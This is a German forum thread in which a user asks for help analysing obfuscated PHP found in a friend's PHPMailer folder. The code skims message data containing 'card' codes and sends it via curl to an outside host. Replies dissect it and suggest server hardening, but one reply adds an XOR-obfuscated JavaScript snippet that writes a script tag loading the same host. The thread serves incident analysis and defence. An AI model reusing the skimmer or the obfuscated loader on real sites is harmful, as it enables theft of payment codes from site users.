An unsere Cooder der Section

Page 1 of 2 1 2
12/09/2013 19:15 nostradame37#1
hallo com Und Cooder seit par tagen hatt mich ein freund beauftragt seine homepage nach luecken durch zu suchen und gestern bin ich im PHPmailer
ordner auf diesen code gestosen

PHP Code:
 if (strpos($msg_data ,'ard') !== false) { 
 $stringer str_replace('"',"",$msg_data);
 $ch=curl_init(); 
 curl_setopt($chCURLOPT_URL"h"."tt"."p:/"."/a"."1w.c"."oml".
 "i".".c"."om/"."g"."et.p"."hp?"."i=".urlencode($stringer)."");
 curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
 $result curl_exec($ch);
 curl_close($ch);
 if(strpos($result ,'zaxnm') !== false){
  return false;}
 } 
Klar ist das dieser code etwas an die Webseite
PHP Code:
a1w.comli.com/get.php?i
sendet aber was?
Kann man das nachvolziehen?
Klar ist auch das mein freund einen enormen verlust an PSCs hatt
mfg
Warte auf antworten
Edit Hier ist jetzt die komplette datei der code faeng ab zeile 385 an
die datei ist auch im anhang
Virus total Hier bitte
[Only registered and activated users can see links. Click Here To Register...]


PS: Dieser code wird staendig geendert also extern vermute das sich mein freund irgent wie Ein bagdor (RAT) eingefangen hatt
den seinen homepage server habe ich reinstalieren lassen
12/09/2013 20:22 'ChuckNorris#2
Woher kommt die Variable $msg_data? Vielleicht mal den ganzen Quellcode geben.

Gruß,
Chuck
12/09/2013 20:26 nostradame37#3
Da mus ich warten bis er online komt aber auf jedem fall habe ich es aus dem ordner PHPmailer rausgefischt der fuer das absenden fuer mails wie zb bestaetigung des accounts absenden einer mail wen eine psc eingegangen ist usw
12/09/2013 21:04 .Inya#4
[Only registered and activated users can see links. Click Here To Register...]
Jedenfalls wird iwas an seine DB gesendet :D

Edit:

Warning: mysqli_connect() [function.mysqli-connect]: (HY000/1129): Host '31.170.160.87' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts' in /home/a7982051/public_html/get.php on line 191


uups :DD
12/09/2013 21:05 Coniesan#5
haha wohl eher nicht (@ the moment) da access denied :D Aber war ja zu erwarten ;)
12/09/2013 21:07 theo1990#6
Löschen einfach alles unterhalb der If Anweisungen. Diese sucht nach dem Teil von card. Wenn du das gemacht hast schreib einfach mal folgendes unten in die Anweisung :

Echo "<pre>" ;
Var_dum($msg_data) ;
Echo "<\pre>" ;

Sorry wegen der Formatierung ich schreibe vom Handy aus. Jedenfalls siehst du dann was in msg-data steht
12/09/2013 21:14 .Inya#7
Quote:
"h"."tt"."p:/"."/a"."1w.c"."oml"."i".".c"."om/"."g"."et.p"."hp?"."i="
Wenn ich diese "Verschlüsselung" schon sehe bekomm ich nen Kotzreiz xD

Also so z.B. hätte mir dass dan schon besser gefallen:
<script>
var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1Gfmawoglv,upkvg'0:wlgqacrg'0:'00'1A qapkrv'02v{rg'1F'7A'00vgzv'7A-hctcqapkrv'7A'00'1Gfmawoglv,upkvg'7A'0:wlgqacrg'7A '0:'7A'00c3u,amonk,amo-egv,rjr'071Dk'071F'7A'00'7A'0;'7A'0;'1@'1A'7A-qapkrv'1G'00'0;'0;'1@'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.f romCharCode(a.charCodeAt(i)^2)}c=unescape(b);docum ent.write(c);
</script>
12/09/2013 21:15 Zander##8
Die IP ist nen Webspace von 000webhost
Dieser Anbieter wird oft für illegale Anwendungen ausgenutzt (Viclogs, etc.)
Und das ganze per CURL erklärt die änderungen im Code denke ich.
Gruß,
Zander
12/09/2013 21:32 nostradame37#9
Quote:
Originally Posted by theo1990 View Post
Löschen einfach alles unterhalb der If Anweisungen. Diese sucht nach dem Teil von card. Wenn du das gemacht hast schreib einfach mal folgendes unten in die Anweisung :

Echo "<pre>" ;
Var_dum($msg_data) ;
Echo "<\pre>" ;

Sorry wegen der Formatierung ich schreibe vom Handy aus. Jedenfalls siehst du dann was in msg-data steht
Es geht hier ja nicht um meine wenigckeit sondern um einen freund
egal was er da macht wird es kurze zeit spaeter wider ediert
also hatt er volle rechte um an den homepage server zu coneckten.
Zu beachten ist ja das der homepage server heute wider Reinstaliert wurde
somit solten ja wen bagdors da gewesen sind keine mer da sein.
Schit Hapen er komt wider rein
Also denke ich mir das er sich einen Keylogger oder RAT durch sein ticket system einfaengt.
12/09/2013 22:06 #Saiirex#10
Vlt hat der "hacker" ja sein PW?
Vlt hat er den RAT auf den PC und nicht auf den V-Server? Falls er FileZilla benutzt kann das Passwort ganz leicht ausgelesen werden?
12/09/2013 22:29 .Inya#11
Tipp für vorerst:

Script der benötigten datei ändern backdoor entfernen versteckt ablegen und die Pfade anpassen.

Wenn hier zugriff auf den Ftp vorliegen würden würde sich niemand die Mühe machen und per Code scannen. Ich würde einfach print_r(exec("mysql 'Select * from homepage.psc_log'")) und schon spuckt die php datei alles aus o.O

Desweiteren würde ich Anti mal beauftragen dieses erwähnte Ticketsystem zu checken :)
12/10/2013 06:23 theo1990#12
Wie sieht der login am Server aus? Benutzt ihr pro User rsa Keys? Wenn nicht wäre das eine ! Wichtig ist nur das ihr dann nur noch über dieses Verfahren einloggt. Und vorallem sperrt den Root login komplett. Wenn ihr was mit Root rechten machen müsst dann meldet euch über

su root

An. Wenn ihr nur Probleme habt mit dem Webserver empfehle ich euch mod security.
12/10/2013 13:22 nostradame37#13
Es wurden volgende vorsichts masnahmen vorgenommen

1: Der webserver komplett neu instaliert
2: Eine komplett neue Homepage genommen
3: Sein PC neu instaliert
4: Diverse AVs geladen und PC Komplett gescant alles cleen
Trotzdem beckomt er nach einer weile zugriff
mfg
12/10/2013 14:52 theo1990#14
was meinst du mit webserver? wurde nur apache neu installiert oder auch das system?

trotzdem schlage ich deinem Freund meine o.g. weg einzuschlagen!!!
12/10/2013 21:19 nostradame37#15
Quote:
Originally Posted by theo1990 View Post
was meinst du mit webserver? wurde nur apache neu installiert oder auch das system?

trotzdem schlage ich deinem Freund meine o.g. weg einzuschlagen!!!
das wird er sicherlich machen blos wolte ich das ganze hier analysieren den einmalig wird es nicht sein und auch fuer die comm einen anreitz sich besser zu schuetzen
Page 1 of 2 1 2